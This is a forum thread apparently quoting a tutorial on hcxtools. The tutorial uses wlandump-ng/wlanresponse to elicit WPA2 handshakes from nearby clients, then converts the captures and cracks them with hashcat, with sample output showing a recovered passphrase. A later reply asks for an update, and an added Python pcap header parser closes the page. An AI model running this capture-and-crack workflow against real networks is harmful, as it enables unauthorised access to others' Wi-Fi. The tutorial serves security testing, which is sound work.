hcxtools - solution for capturing wlan traffic and conversion to hashcat formats
(07-22-2017, 10:07 AM)ZerBea Wrote: basic tutorial about the features to capture passwords from wlantraffic

1.
Choose a place where you do expect to receive many, many clients.
Run wlandump-ng or wlanresponse for a while (one or more hours) using these options:

on a notebook
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20

on a raspberry
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0
wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L


mydevice is your WLAN device (it must already be running in monitor mode on a real device - do not use virtual devices like mon0).

Please download and use the attached test.cap for this tutorial
Extract and copy the cap to a folder and open a terminal inside.

2.
Let's check the cap:

$ wlancapinfo -i test.cap
input file.......: test.cap
magic file number: 0xa1b2c3d4 (cap/pcap)
major version....: 2
minor version....: 4
data link type...: 105 (DLT_IEEE802_11) [http://www.tcpdump.org/linktypes.html]
packets inside...: 6
last pcap error..: flawless

The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there is information inside that other tools are not able to strip.


Let's convert the cap:

$ wlancap2hcx -o test.hccapx -e wordlist test.cap
start reading from test.cap
6 packets processed (6 wlan, 0 lan, 0 loopback)
found 1 wpa2 AES Cipher, HMAC-SHA1
found 1 valid wpa handshake (by wlandump-ng/wlanresponse)

You can see that there's a valid WPA2 handshake inside and that
wlandump-ng/wlanresponse initiates the authentication with the client.
No accesspoint captured - there is no need to capture an accesspoint to get the data!
We use the -e option to save networknames and passwords to a file (it's a good idea to use this option every time you run wlancap2hcx).

$ ls
test.hccapx test.cap  wordlist

Now sort our wordlist:
$ sort wordlist | uniq > wordlistsort
You need to do this, because there are many dupes inside.

$ ls
test.hccapx test.cap  wordlist wordlistsort

Now run hashcat:
$ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
hashcat (v3.6.0-247-g8f2cbb26) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
Guess.Base.......: File (wordlistsort)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:        0 H/s (0.36ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2/2 (100.00%)
Rejected.........: 0/2 (0.00%)
Restore.Point....: 0/2 (0.00%)
Candidates.#1....: AXNDFNEU -> UPC501953949
HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8

Take a look into the potfile and you can imagine what's going on.
You cracked the hash, using the captured password from wlantraffic.

It's a good idea to add/copy/cat the wordlist to your wordlist(s) - every time you run wlancap2hcx on new cap files.

Hello ZerBea, I hope you are doing well.
I tried to understand and reproduce this exact same procedure in hopes to recover the PSK if it's present in the network traffic. As these tools are not available anymore because they are updated to the latest hcxtools, I am unable to reproduce this.

Can you please update this exact tutorial using the latest set of hcxtools?

regards.
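
The header fields that the wlancapinfo step in the quoted tutorial prints (magic number, version, data link type, packet count) can be read directly from a classic pcap file. The following is an added example, not part of the original posts and not hcxtools code; the function names and the sample capture are constructed for illustration, and the record payloads are placeholders rather than real 802.11 frames.

```python
import struct

# Magic as read big-endian -> (struct byte order of the file, timestamp resolution)
MAGICS = {0xA1B2C3D4: (">", "us"), 0xD4C3B2A1: ("<", "us"),
          0xA1B23C4D: (">", "ns"), 0x4D3CB2A1: ("<", "ns")}
# A few link types; 105 is the one reported for test.cap on this page.
LINKTYPES = {1: "DLT_EN10MB", 105: "DLT_IEEE802_11", 127: "DLT_IEEE802_11_RADIO"}

def pcap_info(data: bytes) -> dict:
    """Parse the global header of a classic pcap file and count its records."""
    if len(data) < 24:
        raise ValueError("shorter than the 24-byte pcap global header")
    raw = struct.unpack(">I", data[:4])[0]
    if raw not in MAGICS:
        raise ValueError(f"not a classic pcap file (magic 0x{raw:08x})")
    order, resolution = MAGICS[raw]
    magic, major, minor, _tz, _sig, snaplen, linktype = struct.unpack(
        order + "IHHiIII", data[:24])
    packets, offset, error = 0, 24, None
    while offset < len(data):
        if offset + 16 > len(data):
            error = "truncated record header"
            break
        # Record header: ts_sec, ts_frac, captured length, original length
        _sec, _frac, incl_len, _orig = struct.unpack(
            order + "IIII", data[offset:offset + 16])
        if incl_len > snaplen or offset + 16 + incl_len > len(data):
            error = "truncated or oversized packet data"
            break
        packets += 1
        offset += 16 + incl_len
    return {"magic": magic, "resolution": resolution, "major": major,
            "minor": minor, "snaplen": snaplen, "linktype": linktype,
            "linktype_name": LINKTYPES.get(linktype, "unknown"),
            "packets": packets, "error": error}

def build_sample(n_packets: int = 6) -> bytes:
    """Constructed little-endian capture: link type 105, placeholder payloads."""
    blob = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
    for i in range(n_packets):
        payload = bytes([i]) * 10  # placeholder bytes, not a real frame
        blob += struct.pack("<IIII", 1500710832 + i, 0,
                            len(payload), len(payload)) + payload
    return blob

if __name__ == "__main__":
    for key, value in pcap_info(build_sample()).items():
        print(f"{key:.<17}: {value}")
```

A file whose last record is cut short is reported through the `error` field with the count of complete records, which is a quick integrity check before handing a capture to any converter.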


Messages In This Thread
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - by sata - 03-30-2021, 06:31 PM